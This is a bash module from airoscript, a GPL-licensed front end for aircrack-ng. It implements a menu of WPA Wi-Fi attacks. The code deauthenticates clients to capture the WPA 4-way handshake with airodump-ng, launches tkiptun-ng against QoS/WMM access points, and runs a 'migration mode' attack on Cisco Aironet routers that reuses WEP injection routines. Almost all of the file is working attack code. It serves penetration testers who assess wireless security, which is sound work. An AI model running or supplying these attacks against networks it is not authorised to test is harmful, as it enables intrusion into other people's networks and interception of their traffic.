# Wpa attack functions for airoscript
# Copyright (C) 2011 David Francos Cuartero
#        This program is free software; you can redistribute it and/or
#        modify it under the terms of the GNU General Public License
#        as published by the Free Software Foundation; either version 2
#        of the License, or (at your option) any later version.

#        This program is distributed in the hope that it will be useful,
#        but WITHOUT ANY WARRANTY; without even the implied warranty of
#        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#        GNU General Public License for more details.

#        You should have received a copy of the GNU General Public License
#        along with this program; if not, write to the Free Software
#        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

# Warning! at least generic, internal and interface must be loaded before this one!

check_function auth_attacks_fake || source $path/attacks/auth # It depends on auth module ;)
check_function wep_attacks || source $path/attacks/wep

wpa_attacks(){
    hardclean && $clear
    attack=$1; shift;
    wpa_attacks_$attack $@
    notification=$attack_notification
}

wpa_attacks_menu(){
    help_fifo $"${mark}${red}WPA attacks${end}\n"\
        "You're seeing this menu because the network you selected has WPA encryption\n"\
        "${red}Standard deauth attack${end}\n"\
        "Deauths a client, then waits for the client to reconnect and tries to capture the 4-way handshake\n"\
        "${red}QOS attack${end}\n"\
        "Launches tkiptun-ng to try to crack some vulnerable accesspoints to the wmm stuff\n"\
        "${red}WPA Migration Mode attack${end}\n"\
        "This attack targets on Cisco Aironet routers, wich set both WPA and WEP encriptions on the same sssid\nIt listens for a wep-encapsulated arp packet and retransmits it (bitflipped to make it into an ARP coming from the attacker's MAC)"

    while true; do
        $clear; mkmenu $"Select WPA Attack" $"Standard attack" $"Standard attack with QoS (WMM)" $"WPA migration mode" $"Return to main menu"
        case $choice in
             1) wpa_attacks handshake; $clear; break;;
             2) wpa_attacks qos; $clear; break;;
             3) wpa_attacks wpamm; $clear; break;;
             4) $clear; break;;
        esac
    done
}

wpa_attacks_wpamm(){
    {
        Host_ENC="WEP";
        wep_attacks fakeauto &
        {
            AUTO=2;
            choice=3;
            othersinjectmenu;
            AUTO=0;
            $clear;
        }; $clear;
    } && Host_ENC="WPA";
    $clear; echo; $clear;
}

wpa_attacks_handshake(){

    [[ $dynamic_client_selection ]] && {
        auto_scan_clients;
        select_client;
    }

    [[ $Client_MAC != ""  ]] && { directed=1; }
    export time_=0;
    execute $"Capturing data on channel: $Host_CHAN"  $AIRODUMP --ignore-negative-one  -w $DUMP_PATH/$Host_MAC --bssid $Host_MAC --channel $Host_CHAN -a $wifi
    export time_=1
    [[ $directed == 1 ]] && choose_deauth 2
    [[ $directed != 1 ]] && choose_deauth 3


}

wpa_attacks_qos(){
     iwconfig $wificard channel $Host_CHAN # Hope this is ok for all cards
    export time_=0;
     execute $"Executing tkiptun-ng for ap $Host_MAC"  $TKIPTUN -h $FAKE_MAC -a $Host_MAC -m $TKIPTUN_MIN_PL -n $TKIPTUN_MAX_PL  $wifi
}

